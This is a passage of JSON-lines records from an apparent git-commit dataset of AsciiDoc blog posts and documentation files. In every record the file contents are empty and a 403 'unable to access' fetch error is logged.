2017-02-21-Tesing-Hub-Press.adoc","repos":"meetsandesh\/blogs,meetsandesh\/blogs","old_file":"_posts\/2017-02-21-Tesing-Hub-Press.adoc","new_file":"_posts\/2017-02-21-Tesing-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/meetsandesh\/blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"711716c8247d98b303a8a8afdaec8e6d2b96aba2","subject":"y2b create post Checking Out Microsoft Office 365","message":"y2b create post Checking Out Microsoft Office 365","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-20-Checking-Out-Microsoft-Office-365.adoc","new_file":"_posts\/2016-01-20-Checking-Out-Microsoft-Office-365.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2adaeb4ae3a44ef0e4156ec169439aebf6e8dd27","subject":"y2b create post Uncharted 3 Collector's Edition Unboxing","message":"y2b create post Uncharted 3 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-01-Uncharted-3-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-01-Uncharted-3-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcbb0a73accad22ab892e61f2e376ae46e1d5c1c","subject":"new hosa blog (#304)","message":"new hosa blog (#304)\n\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/04\/05\/deploy-hosa-easily.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/04\/05\/deploy-hosa-easily.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7c69d14e772ab3ba1303601b24b2ceb53f86487","subject":":memo: nodejs-azure-sqlserver-mssql","message":":memo: nodejs-azure-sqlserver-mssql\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/nodejs-azure-sqlserver-mssql.adoc","new_file":"src\/refills\/javascript\/nodejs-azure-sqlserver-mssql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a44aa83479dbb37c3ff9422f3821c4ead42a0694","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a0f9217e05cf9d76a3ac9c658d3cdc511d07f58","subject":"y2b create post Skyrim Collector's Edition Unboxing","message":"y2b create post Skyrim Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-11-Skyrim-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-11-Skyrim-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d65d04e0edf67cc8cd2cc54b7f22513566ccbd9e","subject":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","message":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa128f8a006c0e9d77bb595409d0e43b4994aad4","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c515f30355a95a1f45a283edb43b2d4aa850a41f","subject":"y2b create post Unlock Any MacBook Without The Password","message":"y2b create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-29-UnlockAnyMacBookWithoutThePassword.adoc","new_file":"_posts\/2017-11-29-UnlockAnyMacBookWithoutThePassword.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d209d79bc14d8859fb8c8d031a6c2d9fe3dc25b","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5da3cea82d9a4d8d2ab620984cc56c67329df3e","subject":"added table of content in HTML output","message":"added table of content in HTML output\n\n[ci skip]\n","repos":"yinheli\/jPOS,sebastianpacheco\/jPOS,juanibdn\/jPOS,alcarraz\/jPOS,c0deh4xor\/jPOS,atancasis\/jPOS,alcarraz\/jPOS,jpos\/jPOS,bharavi\/jPOS,juanibdn\/jPOS,yinheli\/jPOS,barspi\/jPOS,c0deh4xor\/jPOS,yinheli\/jPOS,sebastianpacheco\/jPOS,atancasis\/jPOS,poynt\/jPOS,poynt\/jPOS,alcarraz\/jPOS,barspi\/jPOS,sebastianpacheco\/jPOS,bharavi\/jPOS,c0deh4xor\/jPOS,juanibdn\/jPOS,jpos\/jPOS,poynt\/jPOS,jpos\/jPOS,barspi\/jPOS,atancasis\/jPOS,bharavi\/jPOS","old_file":"doc\/src\/asciidoc\/master.adoc","new_file":"doc\/src\/asciidoc\/master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpos\/jPOS.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"889bd661fc86a397c384edfefe021494a5008b0b","subject":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","message":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39444f8d167a73d5a197e8db9d7a631322cdb3a4","subject":"Sorted out Auto instr","message":"Sorted out Auto instr\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94e07f34b5c3d5d1ba255af30617b188de3a3c93","subject":"y2b create post Back To The Future 25th Anniversary Blu Ray Unboxing \\u0026 Overview + Macro Shots!","message":"y2b create post Back To The Future 25th Anniversary Blu Ray Unboxing \\u0026 Overview + Macro Shots!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-13-Back-To-The-Future-25th-Anniversary-Blu-Ray-Unboxing-u0026-Overview--Macro-Shots.adoc","new_file":"_posts\/2011-01-13-Back-To-The-Future-25th-Anniversary-Blu-Ray-Unboxing-u0026-Overview--Macro-Shots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6f6324856ab7d561870f98dab8d3969e246ba3c","subject":"Add a Neo4j extension guide","message":"Add a Neo4j extension guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/neo4j-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/neo4j-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f55e728cde7db2a27ceff92bcc982b01f15039b9","subject":"Renamed '_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc' to '_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc'","message":"Renamed '_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc' to '_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc'","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0293e4bb382cbf677d82d91be18d39fa2a02b1","subject":"Update 2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","message":"Update 2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","new_file":"_posts\/2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1307b0d9aa3312498da651d8cbde6c480d247443","subject":"Update 2016-02-28-First-Post.adoc","message":"Update 2016-02-28-First-Post.adoc","repos":"johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io","old_file":"_posts\/2016-02-28-First-Post.adoc","new_file":"_posts\/2016-02-28-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johannewinwood\/johannewinwood.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3998ca6253265ec6236babab71c97f2923c7bf75","subject":"y2b create post iPhone 6 Impostor - Runs Android","message":"y2b create post iPhone 6 Impostor - Runs Android","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-22-iPhone-6-Impostor--Runs-Android.adoc","new_file":"_posts\/2014-08-22-iPhone-6-Impostor--Runs-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da71c4866af657876f80f407c7bbf6e9ab300ea2","subject":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","message":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de0dfbe63daa525033ea2983db92157447b8e9d","subject":"Update 2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","message":"Update 2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","new_file":"_posts\/2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4797aafd557236308a3b1c5106a2df5f5c567737","subject":"Update 2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","message":"Update 2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","new_file":"_posts\/2017-03-30-Connecting-Satellite-6-and-Ansible-Tower.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7af463bd5b3d2e5fa1173e0285f592ad6430c809","subject":"Update 2016-01-05-One-of-these-is-not-like-the-other.adoc","message":"Update 2016-01-05-One-of-these-is-not-like-the-other.adoc","repos":"duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse,duggiemitchell\/JavascriptMuse","old_file":"_posts\/2016-01-05-One-of-these-is-not-like-the-other.adoc","new_file":"_posts\/2016-01-05-One-of-these-is-not-like-the-other.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duggiemitchell\/JavascriptMuse.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ef4d6968a7ee9bcf24010cfe4898555de638c26","subject":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","message":"Update 2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_file":"_posts\/2018-01-05-carry-out-tutorial-on-Laravel-amp-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7755e48eadd7fef0c880497ac581fcb0c279885e","subject":"Add docker.adoc","message":"Add docker.adoc\n","repos":"google\/grr-doc","old_file":"docker.adoc","new_file":"docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/google\/grr-doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccd9f3bc842e004f898a76e651dea5880d26fac3","subject":"Update 2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","message":"Update 2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","new_file":"_posts\/2015-07-23-Music-visualization-for-Hidden-in-Darkness-using-P5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff26496c9de21e97b70e12537c09c1c848170696","subject":"Update 2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","message":"Update 2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","repos":"modmaker\/modmaker.github.io,modmaker\/modmaker.github.io,modmaker\/modmaker.github.io","old_file":"_posts\/2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","new_file":"_posts\/2015-07-11-eXtended-IO-for-the-BeBoPr-the-XIO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/modmaker\/modmaker.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6f2d0751b45885302b3aa299ec517b1103afc7","subject":"Update 2015-09-20-Python-naming-conventions-for-underscores.adoc","message":"Update 2015-09-20-Python-naming-conventions-for-underscores.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-naming-conventions-for-underscores.adoc","new_file":"_posts\/2015-09-20-Python-naming-conventions-for-underscores.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3864352c09f66aceb784ec04db1962fbb188b8d","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad417808195def401018444bae38eefd3a9703b","subject":"Changes to work around broken manual placed TOC rendering.","message":"Changes to work around broken manual placed TOC rendering.\n","repos":"pidydx\/artifacts,sebastianwelsh\/artifacts,pidydx\/artifacts,destijl\/artifacts,destijl\/artifacts,sebastianwelsh\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cda36155ea370d75f2d0837d71a95de098c46139","subject":"Update 2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","message":"Update 2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","new_file":"_posts\/2017-06-21-Signalr-Client-on-Azure-Web-Job-calling-SignalR-hub-which-is-using-the-Service-Bus-Backplane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49a98527a4f83948178ef233efc08cf85dd0763a","subject":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-Fastlane-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5477b98fa39e072484ca2777cd14dab7aa0a3f19","subject":"explain caching terms at a central place?","message":"explain caching terms at a central place?\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_terms.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_terms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81276a8e113ef342c73870a1f4e1350a6fe42f61","subject":"updating hawkular metrics docs","message":"updating hawkular metrics docs\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7627908d2c336fea9133ae600b954fb81b428543","subject":"initial for eclipsecon 2014","message":"initial for eclipsecon 2014\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/eclipsecon\/semver.adoc","new_file":"2014\/eclipsecon\/semver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e641a7ac9b8725fd7dcbcf6b35f8cf9b96634e4","subject":"Update 2015-12-20-T143744000-Z-Google-Material-Design.adoc","message":"Update 2015-12-20-T143744000-Z-Google-Material-Design.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2015-12-20-T143744000-Z-Google-Material-Design.adoc","new_file":"_posts\/2015-12-20-T143744000-Z-Google-Material-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37db4aa053e6ba6aa1ff8d457c26d8510a86cb6b","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-personnalite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee752f434fe59f892961892a6784e112abbeb6e7","subject":"y2b create post Unboxing Jack's New Laptop...","message":"y2b create post Unboxing Jack's New Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-04-Unboxing%20Jack's%20New%20Laptop....adoc","new_file":"_posts\/2018-02-04-Unboxing%20Jack's%20New%20Laptop....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6653b4f2e4c76aa24a1c9c00498606a1fd00fde5","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"193c96c87bee13b3afe3924050968b38249eb61c","subject":"y2b create post This Speaker Has A Special Trick...","message":"y2b create post This Speaker Has A Special Trick...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-12-This-Speaker-Has-A-Special-Trick.adoc","new_file":"_posts\/2016-09-12-This-Speaker-Has-A-Special-Trick.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f18559b1d0f5d036cb1328b486ccfacded8fbcd","subject":"Duplicate entry","message":"Duplicate entry\n","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60e1bddd80afe83ad172b17efb58d572d8a96ff2","subject":"Update 